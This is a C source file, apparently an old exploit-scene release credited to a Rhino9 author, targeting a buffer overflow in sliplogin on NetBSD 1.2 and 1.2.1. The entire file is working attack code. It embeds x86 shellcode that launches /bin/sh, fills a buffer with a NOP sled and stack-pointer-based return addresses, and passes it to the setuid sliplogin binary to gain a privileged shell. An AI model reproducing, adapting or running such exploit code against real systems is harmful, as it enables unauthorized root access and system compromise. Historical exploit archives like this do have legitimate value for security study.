/* 	Coded by: humble of Rhino9
	sliplogin buffer overflow for netbsd 1.2 1.2.1
*/

#include <stdlib.h>
#include <unistd.h>

char shellcode[] =
  "\xeb\x23"
   "\x5e"
   "\x8d\x1e"
   "\x89\x5e\x0b"
   "\x31\xd2"
   "\x89\x56\x07"
   "\x89\x56\x0f"
   "\x89\x56\x14"
   "\x88\x56\x19"
   "\x31\xc0"
   "\xb0\x3b"
   "\x8d\x4e\x0b"
   "\x89\xca"
   "\x52"
   "\x51"
   "\x53"
   "\x50"
   "\xeb\x18"
   "\xe8\xd8\xff\xff\xff"
   "/bin/sh"
   "\x01\x01\x01\x01"
   "\x02\x02\x02\x02"
  "\x03\x03\x03\x03"
  "\x9a\x04\x04\x04\x04\x07\x04";

unsigned long get_esp(void)
{
 __asm__("movl %esp, %eax");
}

void main(int argc, char **argv)
{
 char *buf,*p;
 unsigned long *adr;

 int i,off;

	if (argc>1)
		off=atoi(argv[1]);
	else off=4;
printf("using buffer delta:%d\n",off);

 if((p = buf = malloc(2268+28+off))==NULL)
  exit(-1);

 memset(p, 0x90, 2268+off);
 p += 2268+off - strlen(shellcode);

 for(i = 0; i < strlen(shellcode); i++)
  *p++ = shellcode[i];
 adr = (long *)p;
 for(i = 0; i < 7; i++)
  *adr++ = get_esp();
 p = (char *)adr;
 *p = 0;
 execl("/usr/sbin/sliplogin", "sliplogin",buf, NULL);
}